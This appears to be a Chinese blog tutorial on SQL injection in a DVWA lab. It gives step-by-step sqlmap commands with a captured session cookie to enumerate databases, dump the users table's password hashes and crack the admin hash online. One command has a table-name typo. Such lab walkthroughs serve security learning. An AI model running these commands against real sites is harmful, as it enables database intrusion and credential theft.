在前面的几篇文章,我们已经简单介绍了SQL注入攻击和DVWA实验环境的搭建,详见初识渗透测试—最常见黑客攻击方式SQL注入简介,黑客常利用的漏洞?Windows下安装DVWA漏洞测试环境。今天我们就开始第一个攻击实验DVWA下的SQL注入!
1、实验环境介绍
攻击机 Kali Linux IP192.168.11.1
靶机 Win7 IP192.168.11.128
所使用的工具:SQLmap,火狐浏览器下的Tamper Data,DVWA漏洞环境
2、首先我们使用攻击机访问靶机下搭建的DVWA页面。(地址为http://192.168.11.128/dvwa/)
3、使用火狐浏览器自带的插件Tamper Data(没有安装的小伙伴可以去菜单-附加组件-搜索安装,并在工具下打开使用),查看Web应用后台提交给目标服务器的POST参数,Cookie值等数据。访问SQL注入页面,使用Tamper Data查看提交的数据。
Tamper Data获取到的访问请求数据
3、下面使用SQLmap 扫描,参数如下
root@kali:~# sqlmap -u 'http://192.168.11.128/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit' --cookie='security=low; PHPSESSID=9d83ls1op19rjq1c2j0tih9smk'
这句指令 -u 就是刚才Tamper Data获取的目标URL,使用 --cookie参数就为了使用当前会话Cookie,对漏洞页面进行持续扫描。
通过扫描这个页面,我们的扫描结果已经把这个站点的详细信息列了出来,并且存在SQL注入点(如果不存在,我这个实验环境不白搭了吗。。。),该站点数据库版本信息为MySQL 5.0,Web应用版本为PHP 7.1.11, Apache 2.4.29。
4、下一步我们就来获取这个MySQL数据库名。参数如下
root@kali:~# sqlmap -u 'http://192.168.11.128/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit' --cookie='security=low; PHPSESSID=9d83ls1op19rjq1c2j0tih9smk' --dbs -v
使用 --dbs 参数就可以探测所包含的数据库名称,扫描结果显示出了Web应用的数据库DVWA。
5、接下来,使用以下参数来查询dvwa数据库中的表名,参数如下
root@kali:~# sqlmap -u 'http://192.168.11.128/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit' --cookie='security=low; PHPSESSID=9d83ls1op19rjq1c2j0tih9smk' -D dvwa --tables
这个参数中 -D 就是指定数据库 --table就是列出表名
6、发现一个敏感的的表 users ,下面就来列出 users 表中的字段列表。参数如下
root@kali:~# sqlmap -u 'http://192.168.11.128/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit' --cookie='security=low; PHPSESSID=9d83ls1op19rjq1c2j0tih9smk' -D dvwa --tables -T userd --columns
这个指令中 -T 参数是指定表名 ,--columns参数可以获取该表中的字段。
7、可以看到有一个非常吸引人的字段 password,下面就把这个字段内容下载出来。参数如下
root@kali:~# sqlmap -u 'http://192.168.11.128/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit' --cookie='security=low; PHPSESSID=9d83ls1op19rjq1c2j0tih9smk' -D dvwa --tables -T users --columns --dump
这个指令中的 --dump选项可以获取到这个站点所有的用户名和密码的哈希值
8、这时候我们就已经获取了admin用户的密码哈希加密值,这条加密值我们可以通过网上破解MD5加密的站点进行解密。小编也随便找了一个解密网站对admin用户名的密码哈希值进行了解密,其内容为password。
这只是实验环境,我们能轻易获取到后台管理员的用户名和密码。实际环境与此相比要困难的多,小伙伴们进行实验时有什么问题可以评论在下方,小编会及时回答,指令的输入要注意格式的规范。切记不要对站点进行恶意攻击,做一个遵纪守法的好公民。
有很多小伙伴比较喜欢这方面的内容,想要进行深入的学习,小编以后会常更新一些关于信息安全、网络技术、电脑知识、科技等方面的内容,喜欢的小伙伴可以关注我,我也会持续不断的为大家带来用心创作的内容以及分享一些资源、学习资料。最后